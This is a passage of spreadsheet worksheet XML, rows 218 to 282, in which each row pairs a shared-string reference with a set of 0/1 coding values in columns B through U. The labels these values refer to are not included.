      <c r="U218" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="219" spans="1:21">
      <c r="A219" s="3" t="s">
        <v>218</v>
      </c>
      <c r="B219" s="1">
        <v>1</v>
      </c>
      <c r="C219" s="14">
        <v>0</v>
      </c>
      <c r="D219" s="5">
        <v>0</v>
      </c>
      <c r="E219" s="5">
        <v>0</v>
      </c>
      <c r="F219" s="5">
        <v>1</v>
      </c>
      <c r="G219" s="5">
        <v>0</v>
      </c>
      <c r="H219" s="5">
        <v>0</v>
      </c>
      <c r="I219" s="5">
        <v>0</v>
      </c>
      <c r="J219" s="5">
        <v>1</v>
      </c>
      <c r="K219" s="5">
        <v>0</v>
      </c>
      <c r="L219" s="5">
        <v>0</v>
      </c>
      <c r="M219" s="1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7">
        <v>0</v>
      </c>
      <c r="U219" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="220" spans="1:21" ht="30">
      <c r="A220" s="3" t="s">
        <v>219</v>
      </c>
      <c r="B220" s="1">
        <v>1</v>
      </c>
      <c r="C220" s="14">
        <v>0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1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7">
        <v>1</v>
      </c>
      <c r="U220" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="221" spans="1:21" ht="30">
      <c r="A221" s="3" t="s">
        <v>220</v>
      </c>
      <c r="B221" s="1">
        <v>1</v>
      </c>
      <c r="C221" s="14">
        <v>1</v>
      </c>
      <c r="D221" s="5">
        <v>0</v>
      </c>
      <c r="E221" s="5">
        <v>0</v>
      </c>
      <c r="F221" s="5">
        <v>0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1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7">
        <v>0</v>
      </c>
      <c r="U221" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="222" spans="1:21">
      <c r="A222" s="3" t="s">
        <v>221</v>
      </c>
      <c r="B222" s="1">
        <v>1</v>
      </c>
      <c r="C222" s="1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1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7">
        <v>0</v>
      </c>
      <c r="U222" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="223" spans="1:21">
      <c r="A223" s="3" t="s">
        <v>222</v>
      </c>
      <c r="B223" s="1">
        <v>1</v>
      </c>
      <c r="C223" s="1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1</v>
      </c>
      <c r="I223" s="5">
        <v>0</v>
      </c>
      <c r="J223" s="5">
        <v>0</v>
      </c>
      <c r="K223" s="5">
        <v>0</v>
      </c>
      <c r="L223" s="5">
        <v>0</v>
      </c>
      <c r="M223" s="1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7">
        <v>0</v>
      </c>
      <c r="U223" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="224" spans="1:21">
      <c r="A224" s="3" t="s">
        <v>223</v>
      </c>
      <c r="B224" s="1">
        <v>0</v>
      </c>
      <c r="C224" s="14">
        <v>0</v>
      </c>
      <c r="D224" s="5">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U224" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="225" spans="1:21" ht="30">
      <c r="A225" s="3" t="s">
        <v>224</v>
      </c>
      <c r="B225" s="1">
        <v>0</v>
      </c>
      <c r="C225" s="14">
        <v>0</v>
      </c>
      <c r="D225" s="5">
        <v>0</v>
      </c>
      <c r="E225" s="5">
        <v>0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1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7">
        <v>0</v>
      </c>
      <c r="U225" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="226" spans="1:21" ht="30">
      <c r="A226" s="3" t="s">
        <v>225</v>
      </c>
      <c r="B226" s="1">
        <v>1</v>
      </c>
      <c r="C226" s="1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1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7">
        <v>0</v>
      </c>
      <c r="U226" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="227" spans="1:21" ht="30">
      <c r="A227" s="3" t="s">
        <v>226</v>
      </c>
      <c r="B227" s="1">
        <v>1</v>
      </c>
      <c r="C227" s="14">
        <v>0</v>
      </c>
      <c r="D227" s="5">
        <v>0</v>
      </c>
      <c r="E227" s="5">
        <v>1</v>
      </c>
      <c r="F227" s="5">
        <v>0</v>
      </c>
      <c r="G227" s="5">
        <v>0</v>
      </c>
      <c r="H227" s="5">
        <v>1</v>
      </c>
      <c r="I227" s="5">
        <v>0</v>
      </c>
      <c r="J227" s="5">
        <v>0</v>
      </c>
      <c r="K227" s="5">
        <v>0</v>
      </c>
      <c r="L227" s="5">
        <v>0</v>
      </c>
      <c r="M227" s="1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7">
        <v>1</v>
      </c>
      <c r="U227" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="228" spans="1:21" ht="30">
      <c r="A228" s="3" t="s">
        <v>227</v>
      </c>
      <c r="B228" s="1">
        <v>1</v>
      </c>
      <c r="C228" s="14">
        <v>0</v>
      </c>
      <c r="D228" s="5">
        <v>0</v>
      </c>
      <c r="E228" s="5">
        <v>0</v>
      </c>
      <c r="F228" s="5">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U228" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="229" spans="1:21">
      <c r="A229" s="3" t="s">
        <v>228</v>
      </c>
      <c r="B229" s="1">
        <v>1</v>
      </c>
      <c r="C229" s="14">
        <v>0</v>
      </c>
      <c r="D229" s="5">
        <v>0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1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7">
        <v>0</v>
      </c>
      <c r="U229" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="230" spans="1:21" ht="30">
      <c r="A230" s="3" t="s">
        <v>229</v>
      </c>
      <c r="B230" s="1">
        <v>1</v>
      </c>
      <c r="C230" s="14">
        <v>1</v>
      </c>
      <c r="D230" s="5">
        <v>0</v>
      </c>
      <c r="E230" s="5">
        <v>1</v>
      </c>
      <c r="F230" s="5">
        <v>0</v>
      </c>
      <c r="G230" s="5">
        <v>0</v>
      </c>
      <c r="H230" s="5">
        <v>1</v>
      </c>
      <c r="I230" s="5">
        <v>0</v>
      </c>
      <c r="J230" s="5">
        <v>0</v>
      </c>
      <c r="K230" s="5">
        <v>0</v>
      </c>
      <c r="L230" s="5">
        <v>0</v>
      </c>
      <c r="M230" s="1">
        <v>0</v>
      </c>
      <c r="N230" s="14">
        <v>0</v>
      </c>
      <c r="O230" s="14">
        <v>0</v>
      </c>
      <c r="P230" s="14">
        <v>0</v>
      </c>
      <c r="Q230" s="14">
        <v>1</v>
      </c>
      <c r="R230" s="14">
        <v>0</v>
      </c>
      <c r="S230" s="14">
        <v>0</v>
      </c>
      <c r="T230" s="7">
        <v>0</v>
      </c>
      <c r="U230" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="231" spans="1:21" ht="30">
      <c r="A231" s="3" t="s">
        <v>230</v>
      </c>
      <c r="B231" s="1">
        <v>1</v>
      </c>
      <c r="C231" s="14">
        <v>1</v>
      </c>
      <c r="D231" s="5">
        <v>0</v>
      </c>
      <c r="E231" s="5">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U231" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="232" spans="1:21">
      <c r="A232" s="3" t="s">
        <v>231</v>
      </c>
      <c r="B232" s="1">
        <v>0</v>
      </c>
      <c r="C232" s="14">
        <v>0</v>
      </c>
      <c r="D232" s="5">
        <v>0</v>
      </c>
      <c r="E232" s="5">
        <v>0</v>
      </c>
      <c r="F232" s="5">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U232" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="233" spans="1:21" ht="30">
      <c r="A233" s="3" t="s">
        <v>232</v>
      </c>
      <c r="B233" s="1">
        <v>1</v>
      </c>
      <c r="C233" s="14">
        <v>1</v>
      </c>
      <c r="D233" s="5">
        <v>0</v>
      </c>
      <c r="E233" s="5">
        <v>1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1">
        <v>0</v>
      </c>
      <c r="N233" s="14">
        <v>0</v>
      </c>
      <c r="O233" s="14">
        <v>1</v>
      </c>
      <c r="P233" s="14">
        <v>0</v>
      </c>
      <c r="Q233" s="14">
        <v>0</v>
      </c>
      <c r="R233" s="14">
        <v>0</v>
      </c>
      <c r="S233" s="14">
        <v>0</v>
      </c>
      <c r="T233" s="7">
        <v>0</v>
      </c>
      <c r="U233" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="234" spans="1:21">
      <c r="A234" s="3" t="s">
        <v>233</v>
      </c>
      <c r="B234" s="1">
        <v>0</v>
      </c>
      <c r="C234" s="14">
        <v>0</v>
      </c>
      <c r="D234" s="5">
        <v>0</v>
      </c>
      <c r="E234" s="5">
        <v>0</v>
      </c>
      <c r="F234" s="5">
        <v>1</v>
      </c>
      <c r="G234" s="5">
        <v>0</v>
      </c>
      <c r="H234" s="5">
        <v>0</v>
      </c>
      <c r="I234" s="5">
        <v>0</v>
      </c>
      <c r="J234" s="5">
        <v>0</v>
      </c>
      <c r="K234" s="5">
        <v>1</v>
      </c>
      <c r="L234" s="5">
        <v>0</v>
      </c>
      <c r="M234" s="1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7">
        <v>0</v>
      </c>
      <c r="U234" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="235" spans="1:21">
      <c r="A235" s="3" t="s">
        <v>234</v>
      </c>
      <c r="B235" s="1">
        <v>1</v>
      </c>
      <c r="C235" s="1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1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7">
        <v>0</v>
      </c>
      <c r="U235" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="236" spans="1:21" ht="45">
      <c r="A236" s="3" t="s">
        <v>235</v>
      </c>
      <c r="B236" s="1">
        <v>1</v>
      </c>
      <c r="C236" s="14">
        <v>1</v>
      </c>
      <c r="D236" s="5">
        <v>0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0</v>
      </c>
      <c r="K236" s="5">
        <v>0</v>
      </c>
      <c r="L236" s="5">
        <v>0</v>
      </c>
      <c r="M236" s="1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1</v>
      </c>
      <c r="T236" s="7">
        <v>0</v>
      </c>
      <c r="U236" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="237" spans="1:21">
      <c r="A237" s="3" t="s">
        <v>236</v>
      </c>
      <c r="B237" s="1">
        <v>0</v>
      </c>
      <c r="C237" s="1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M237" s="1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7">
        <v>0</v>
      </c>
      <c r="U237" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="238" spans="1:21">
      <c r="A238" s="3" t="s">
        <v>237</v>
      </c>
      <c r="B238" s="1">
        <v>0</v>
      </c>
      <c r="C238" s="14">
        <v>0</v>
      </c>
      <c r="D238" s="5">
        <v>0</v>
      </c>
      <c r="E238" s="5">
        <v>0</v>
      </c>
      <c r="F238" s="5">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U238" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="239" spans="1:21" ht="90">
      <c r="A239" s="3" t="s">
        <v>238</v>
      </c>
      <c r="B239" s="1">
        <v>0</v>
      </c>
      <c r="C239" s="1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1">
        <v>1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7">
        <v>0</v>
      </c>
      <c r="U239" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="240" spans="1:21" ht="30">
      <c r="A240" s="3" t="s">
        <v>239</v>
      </c>
      <c r="B240" s="1">
        <v>1</v>
      </c>
      <c r="C240" s="14">
        <v>0</v>
      </c>
      <c r="D240" s="5">
        <v>0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1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7">
        <v>1</v>
      </c>
      <c r="U240" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="241" spans="1:21">
      <c r="A241" s="3" t="s">
        <v>240</v>
      </c>
      <c r="B241" s="1">
        <v>1</v>
      </c>
      <c r="C241" s="14">
        <v>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1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7">
        <v>0</v>
      </c>
      <c r="U241" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="242" spans="1:21" ht="30">
      <c r="A242" s="3" t="s">
        <v>241</v>
      </c>
      <c r="B242" s="1">
        <v>1</v>
      </c>
      <c r="C242" s="1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1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7">
        <v>0</v>
      </c>
      <c r="U242" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="243" spans="1:21">
      <c r="A243" s="3" t="s">
        <v>242</v>
      </c>
      <c r="B243" s="1">
        <v>1</v>
      </c>
      <c r="C243" s="14">
        <v>0</v>
      </c>
      <c r="D243" s="5">
        <v>0</v>
      </c>
      <c r="E243" s="5">
        <v>0</v>
      </c>
      <c r="F243" s="5">
        <v>1</v>
      </c>
      <c r="G243" s="5">
        <v>0</v>
      </c>
      <c r="H243" s="5">
        <v>1</v>
      </c>
      <c r="I243" s="5">
        <v>0</v>
      </c>
      <c r="J243" s="5">
        <v>0</v>
      </c>
      <c r="K243" s="5">
        <v>0</v>
      </c>
      <c r="L243" s="5">
        <v>0</v>
      </c>
      <c r="M243" s="1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7">
        <v>0</v>
      </c>
      <c r="U243" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="244" spans="1:21" ht="30">
      <c r="A244" s="3" t="s">
        <v>243</v>
      </c>
      <c r="B244" s="1">
        <v>0</v>
      </c>
      <c r="C244" s="14">
        <v>0</v>
      </c>
      <c r="D244" s="5">
        <v>0</v>
      </c>
      <c r="E244" s="5">
        <v>0</v>
      </c>
      <c r="F244" s="5">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U244" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="245" spans="1:21" ht="45">
      <c r="A245" s="3" t="s">
        <v>244</v>
      </c>
      <c r="B245" s="1">
        <v>1</v>
      </c>
      <c r="C245" s="14">
        <v>0</v>
      </c>
      <c r="D245" s="5">
        <v>0</v>
      </c>
      <c r="E245" s="5">
        <v>0</v>
      </c>
      <c r="F245" s="5">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U245" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="246" spans="1:21">
      <c r="A246" s="3" t="s">
        <v>245</v>
      </c>
      <c r="B246" s="1">
        <v>0</v>
      </c>
      <c r="C246" s="14">
        <v>0</v>
      </c>
      <c r="D246" s="5">
        <v>0</v>
      </c>
      <c r="E246" s="5">
        <v>1</v>
      </c>
      <c r="F246" s="5">
        <v>1</v>
      </c>
      <c r="G246" s="5">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U246" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="247" spans="1:21" ht="30">
      <c r="A247" s="3" t="s">
        <v>246</v>
      </c>
      <c r="B247" s="1">
        <v>1</v>
      </c>
      <c r="C247" s="14">
        <v>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1">
        <v>0</v>
      </c>
      <c r="N247" s="14">
        <v>0</v>
      </c>
      <c r="O247" s="14">
        <v>0</v>
      </c>
      <c r="P247" s="14">
        <v>0</v>
      </c>
      <c r="Q247" s="14">
        <v>1</v>
      </c>
      <c r="R247" s="14">
        <v>0</v>
      </c>
      <c r="S247" s="14">
        <v>0</v>
      </c>
      <c r="T247" s="7">
        <v>0</v>
      </c>
      <c r="U247" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="248" spans="1:21">
      <c r="A248" s="3" t="s">
        <v>247</v>
      </c>
      <c r="B248" s="1">
        <v>0</v>
      </c>
      <c r="C248" s="14">
        <v>0</v>
      </c>
      <c r="D248" s="5">
        <v>1</v>
      </c>
      <c r="E248" s="5">
        <v>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1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7">
        <v>0</v>
      </c>
      <c r="U248" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="249" spans="1:21" ht="30">
      <c r="A249" s="3" t="s">
        <v>248</v>
      </c>
      <c r="B249" s="1">
        <v>1</v>
      </c>
      <c r="C249" s="14">
        <v>1</v>
      </c>
      <c r="D249" s="5">
        <v>0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1">
        <v>0</v>
      </c>
      <c r="N249" s="14">
        <v>0</v>
      </c>
      <c r="O249" s="14">
        <v>1</v>
      </c>
      <c r="P249" s="14">
        <v>0</v>
      </c>
      <c r="Q249" s="14">
        <v>0</v>
      </c>
      <c r="R249" s="14">
        <v>0</v>
      </c>
      <c r="S249" s="14">
        <v>0</v>
      </c>
      <c r="T249" s="7">
        <v>0</v>
      </c>
      <c r="U249" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="250" spans="1:21" ht="30">
      <c r="A250" s="3" t="s">
        <v>249</v>
      </c>
      <c r="B250" s="1">
        <v>0</v>
      </c>
      <c r="C250" s="1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1</v>
      </c>
      <c r="M250" s="1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7">
        <v>0</v>
      </c>
      <c r="U250" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="251" spans="1:21" ht="30">
      <c r="A251" s="3" t="s">
        <v>250</v>
      </c>
      <c r="B251" s="1">
        <v>0</v>
      </c>
      <c r="C251" s="14">
        <v>0</v>
      </c>
      <c r="D251" s="5">
        <v>0</v>
      </c>
      <c r="E251" s="5">
        <v>1</v>
      </c>
      <c r="F251" s="5">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U251" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="252" spans="1:21" ht="30">
      <c r="A252" s="3" t="s">
        <v>251</v>
      </c>
      <c r="B252" s="1">
        <v>1</v>
      </c>
      <c r="C252" s="14">
        <v>0</v>
      </c>
      <c r="D252" s="5">
        <v>0</v>
      </c>
      <c r="E252" s="5">
        <v>0</v>
      </c>
      <c r="F252" s="5">
        <v>1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1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7">
        <v>1</v>
      </c>
      <c r="U252" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="253" spans="1:21">
      <c r="A253" s="3" t="s">
        <v>252</v>
      </c>
      <c r="B253" s="1">
        <v>0</v>
      </c>
      <c r="C253" s="14">
        <v>0</v>
      </c>
      <c r="D253" s="5">
        <v>0</v>
      </c>
      <c r="E253" s="5">
        <v>0</v>
      </c>
      <c r="F253" s="5">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U253" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="254" spans="1:21" ht="45">
      <c r="A254" s="3" t="s">
        <v>253</v>
      </c>
      <c r="B254" s="1">
        <v>1</v>
      </c>
      <c r="C254" s="14">
        <v>0</v>
      </c>
      <c r="D254" s="5">
        <v>0</v>
      </c>
      <c r="E254" s="5">
        <v>1</v>
      </c>
      <c r="F254" s="5">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U254" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="255" spans="1:21" ht="30">
      <c r="A255" s="3" t="s">
        <v>254</v>
      </c>
      <c r="B255" s="1">
        <v>1</v>
      </c>
      <c r="C255" s="14">
        <v>1</v>
      </c>
      <c r="D255" s="5">
        <v>0</v>
      </c>
      <c r="E255" s="5">
        <v>1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1">
        <v>0</v>
      </c>
      <c r="N255" s="14">
        <v>0</v>
      </c>
      <c r="O255" s="14">
        <v>0</v>
      </c>
      <c r="P255" s="14">
        <v>1</v>
      </c>
      <c r="Q255" s="14">
        <v>0</v>
      </c>
      <c r="R255" s="14">
        <v>0</v>
      </c>
      <c r="S255" s="14">
        <v>0</v>
      </c>
      <c r="T255" s="7">
        <v>0</v>
      </c>
      <c r="U255" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="256" spans="1:21" ht="30">
      <c r="A256" s="3" t="s">
        <v>255</v>
      </c>
      <c r="B256" s="1">
        <v>1</v>
      </c>
      <c r="C256" s="14">
        <v>1</v>
      </c>
      <c r="D256" s="5">
        <v>0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1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7">
        <v>1</v>
      </c>
      <c r="U256" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="257" spans="1:21" ht="30">
      <c r="A257" s="3" t="s">
        <v>256</v>
      </c>
      <c r="B257" s="1">
        <v>1</v>
      </c>
      <c r="C257" s="1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1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7">
        <v>1</v>
      </c>
      <c r="U257" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="258" spans="1:21">
      <c r="A258" s="3" t="s">
        <v>257</v>
      </c>
      <c r="B258" s="1">
        <v>0</v>
      </c>
      <c r="C258" s="14">
        <v>0</v>
      </c>
      <c r="D258" s="5">
        <v>0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5">
        <v>0</v>
      </c>
      <c r="M258" s="1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7">
        <v>0</v>
      </c>
      <c r="U258" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="259" spans="1:21" ht="60">
      <c r="A259" s="3" t="s">
        <v>258</v>
      </c>
      <c r="B259" s="1">
        <v>1</v>
      </c>
      <c r="C259" s="14">
        <v>1</v>
      </c>
      <c r="D259" s="5">
        <v>0</v>
      </c>
      <c r="E259" s="5">
        <v>1</v>
      </c>
      <c r="F259" s="5">
        <v>0</v>
      </c>
      <c r="G259" s="5">
        <v>0</v>
      </c>
      <c r="H259" s="5">
        <v>1</v>
      </c>
      <c r="I259" s="5">
        <v>0</v>
      </c>
      <c r="J259" s="5">
        <v>0</v>
      </c>
      <c r="K259" s="5">
        <v>0</v>
      </c>
      <c r="L259" s="5">
        <v>0</v>
      </c>
      <c r="M259" s="1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7">
        <v>0</v>
      </c>
      <c r="U259" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="260" spans="1:21" ht="30">
      <c r="A260" s="3" t="s">
        <v>259</v>
      </c>
      <c r="B260" s="1">
        <v>0</v>
      </c>
      <c r="C260" s="1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1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7">
        <v>0</v>
      </c>
      <c r="U260" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="261" spans="1:21">
      <c r="A261" s="3" t="s">
        <v>260</v>
      </c>
      <c r="B261" s="1">
        <v>0</v>
      </c>
      <c r="C261" s="14">
        <v>0</v>
      </c>
      <c r="D261" s="5">
        <v>0</v>
      </c>
      <c r="E261" s="5">
        <v>0</v>
      </c>
      <c r="F261" s="5">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U261" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="262" spans="1:21" ht="30">
      <c r="A262" s="3" t="s">
        <v>261</v>
      </c>
      <c r="B262" s="1">
        <v>1</v>
      </c>
      <c r="C262" s="14">
        <v>1</v>
      </c>
      <c r="D262" s="5">
        <v>0</v>
      </c>
      <c r="E262" s="5">
        <v>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1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7">
        <v>1</v>
      </c>
      <c r="U262" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="263" spans="1:21" ht="30">
      <c r="A263" s="3" t="s">
        <v>262</v>
      </c>
      <c r="B263" s="1">
        <v>0</v>
      </c>
      <c r="C263" s="1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1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7">
        <v>0</v>
      </c>
      <c r="U263" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="264" spans="1:21" ht="30">
      <c r="A264" s="3" t="s">
        <v>263</v>
      </c>
      <c r="B264" s="1">
        <v>0</v>
      </c>
      <c r="C264" s="14">
        <v>0</v>
      </c>
      <c r="D264" s="5">
        <v>0</v>
      </c>
      <c r="E264" s="5">
        <v>1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1</v>
      </c>
      <c r="M264" s="1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7">
        <v>0</v>
      </c>
      <c r="U264" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="265" spans="1:21" ht="90">
      <c r="A265" s="3" t="s">
        <v>264</v>
      </c>
      <c r="B265" s="1">
        <v>0</v>
      </c>
      <c r="C265" s="1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1</v>
      </c>
      <c r="M265" s="1">
        <v>1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7">
        <v>0</v>
      </c>
      <c r="U265" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="266" spans="1:21" ht="30">
      <c r="A266" s="3" t="s">
        <v>265</v>
      </c>
      <c r="B266" s="1">
        <v>1</v>
      </c>
      <c r="C266" s="14">
        <v>0</v>
      </c>
      <c r="D266" s="5">
        <v>0</v>
      </c>
      <c r="E266" s="5">
        <v>1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1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7">
        <v>1</v>
      </c>
      <c r="U266" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="267" spans="1:21">
      <c r="A267" s="3" t="s">
        <v>266</v>
      </c>
      <c r="B267" s="1">
        <v>0</v>
      </c>
      <c r="C267" s="14">
        <v>0</v>
      </c>
      <c r="D267" s="5">
        <v>0</v>
      </c>
      <c r="E267" s="5">
        <v>1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1</v>
      </c>
      <c r="M267" s="1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7">
        <v>0</v>
      </c>
      <c r="U267" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="268" spans="1:21" ht="90">
      <c r="A268" s="3" t="s">
        <v>267</v>
      </c>
      <c r="B268" s="1">
        <v>0</v>
      </c>
      <c r="C268" s="1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1</v>
      </c>
      <c r="M268" s="1">
        <v>1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7">
        <v>0</v>
      </c>
      <c r="U268" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="269" spans="1:21">
      <c r="A269" s="3" t="s">
        <v>268</v>
      </c>
      <c r="B269" s="1">
        <v>1</v>
      </c>
      <c r="C269" s="1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1</v>
      </c>
      <c r="I269" s="5">
        <v>0</v>
      </c>
      <c r="J269" s="5">
        <v>0</v>
      </c>
      <c r="K269" s="5">
        <v>0</v>
      </c>
      <c r="L269" s="5">
        <v>0</v>
      </c>
      <c r="M269" s="1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7">
        <v>0</v>
      </c>
      <c r="U269" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="270" spans="1:21" ht="45">
      <c r="A270" s="3" t="s">
        <v>269</v>
      </c>
      <c r="B270" s="1">
        <v>0</v>
      </c>
      <c r="C270" s="14">
        <v>0</v>
      </c>
      <c r="D270" s="5">
        <v>0</v>
      </c>
      <c r="E270" s="5">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U270" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="271" spans="1:21" ht="30">
      <c r="A271" s="3" t="s">
        <v>270</v>
      </c>
      <c r="B271" s="1">
        <v>1</v>
      </c>
      <c r="C271" s="1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1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7">
        <v>0</v>
      </c>
      <c r="U271" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="272" spans="1:21">
      <c r="A272" s="3" t="s">
        <v>271</v>
      </c>
      <c r="B272" s="1">
        <v>1</v>
      </c>
      <c r="C272" s="14">
        <v>0</v>
      </c>
      <c r="D272" s="5">
        <v>0</v>
      </c>
      <c r="E272" s="5">
        <v>0</v>
      </c>
      <c r="F272" s="5">
        <v>1</v>
      </c>
      <c r="G272" s="5">
        <v>0</v>
      </c>
      <c r="H272" s="5">
        <v>1</v>
      </c>
      <c r="I272" s="5">
        <v>0</v>
      </c>
      <c r="J272" s="5">
        <v>0</v>
      </c>
      <c r="K272" s="5">
        <v>0</v>
      </c>
      <c r="L272" s="5">
        <v>0</v>
      </c>
      <c r="M272" s="1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7">
        <v>0</v>
      </c>
      <c r="U272" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="273" spans="1:21" ht="30">
      <c r="A273" s="3" t="s">
        <v>272</v>
      </c>
      <c r="B273" s="1">
        <v>1</v>
      </c>
      <c r="C273" s="1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1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7">
        <v>0</v>
      </c>
      <c r="U273" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="274" spans="1:21" ht="24">
      <c r="A274" s="11" t="s">
        <v>273</v>
      </c>
      <c r="B274" s="1">
        <v>1</v>
      </c>
      <c r="C274" s="14">
        <v>0</v>
      </c>
      <c r="D274" s="5">
        <v>0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1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7">
        <v>1</v>
      </c>
      <c r="U274" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="275" spans="1:21" ht="45">
      <c r="A275" s="3" t="s">
        <v>274</v>
      </c>
      <c r="B275" s="1">
        <v>1</v>
      </c>
      <c r="C275" s="14">
        <v>1</v>
      </c>
      <c r="D275" s="5">
        <v>0</v>
      </c>
      <c r="E275" s="5">
        <v>1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1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1</v>
      </c>
      <c r="S275" s="14">
        <v>0</v>
      </c>
      <c r="T275" s="7">
        <v>0</v>
      </c>
      <c r="U275" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="276" spans="1:21" ht="30">
      <c r="A276" s="3" t="s">
        <v>275</v>
      </c>
      <c r="B276" s="1">
        <v>1</v>
      </c>
      <c r="C276" s="1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1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7">
        <v>0</v>
      </c>
      <c r="U276" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="277" spans="1:21">
      <c r="A277" s="3" t="s">
        <v>276</v>
      </c>
      <c r="B277" s="1">
        <v>0</v>
      </c>
      <c r="C277" s="1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1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7">
        <v>0</v>
      </c>
      <c r="U277" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="278" spans="1:21">
      <c r="A278" s="3" t="s">
        <v>277</v>
      </c>
      <c r="B278" s="1">
        <v>0</v>
      </c>
      <c r="C278" s="14">
        <v>0</v>
      </c>
      <c r="D278" s="5">
        <v>0</v>
      </c>
      <c r="E278" s="5">
        <v>0</v>
      </c>
      <c r="F278" s="5">
        <v>1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1">
        <v>0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7">
        <v>0</v>
      </c>
      <c r="U278" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="279" spans="1:21" ht="30">
      <c r="A279" s="3" t="s">
        <v>278</v>
      </c>
      <c r="B279" s="1">
        <v>1</v>
      </c>
      <c r="C279" s="14">
        <v>0</v>
      </c>
      <c r="D279" s="5">
        <v>0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1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7">
        <v>1</v>
      </c>
      <c r="U279" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="280" spans="1:21">
      <c r="A280" s="3" t="s">
        <v>279</v>
      </c>
      <c r="B280" s="1">
        <v>1</v>
      </c>
      <c r="C280" s="14">
        <v>0</v>
      </c>
      <c r="D280" s="5">
        <v>0</v>
      </c>
      <c r="E280" s="5">
        <v>0</v>
      </c>
      <c r="F280" s="5">
        <v>1</v>
      </c>
      <c r="G280" s="5">
        <v>0</v>
      </c>
      <c r="H280" s="5">
        <v>0</v>
      </c>
      <c r="I280" s="5">
        <v>0</v>
      </c>
      <c r="J280" s="5">
        <v>1</v>
      </c>
      <c r="K280" s="5">
        <v>0</v>
      </c>
      <c r="L280" s="5">
        <v>0</v>
      </c>
      <c r="M280" s="1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7">
        <v>0</v>
      </c>
      <c r="U280" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="281" spans="1:21" ht="30">
      <c r="A281" s="3" t="s">
        <v>280</v>
      </c>
      <c r="B281" s="1">
        <v>1</v>
      </c>
      <c r="C281" s="14">
        <v>1</v>
      </c>
      <c r="D281" s="5">
        <v>0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1">
        <v>0</v>
      </c>
      <c r="N281" s="14">
        <v>0</v>
      </c>
      <c r="O281" s="14">
        <v>0</v>
      </c>
      <c r="P281" s="14">
        <v>1</v>
      </c>
      <c r="Q281" s="14">
        <v>0</v>
      </c>
      <c r="R281" s="14">
        <v>0</v>
      </c>
      <c r="S281" s="14">
        <v>0</v>
      </c>
      <c r="T281" s="7">
        <v>0</v>
      </c>
      <c r="U281" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="282" spans="1:21">
      <c r="A282" s="3" t="s">
        <v>281</v>
      </c>
      <c r="B282" s="1">
        <v>0</v>
      </c>
      <c r="C282" s="14">
        <v>0</v>
      </c>
      <c r="D282" s="5">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U282" s="1">
        <v>0</v>
      </c>
    </row>
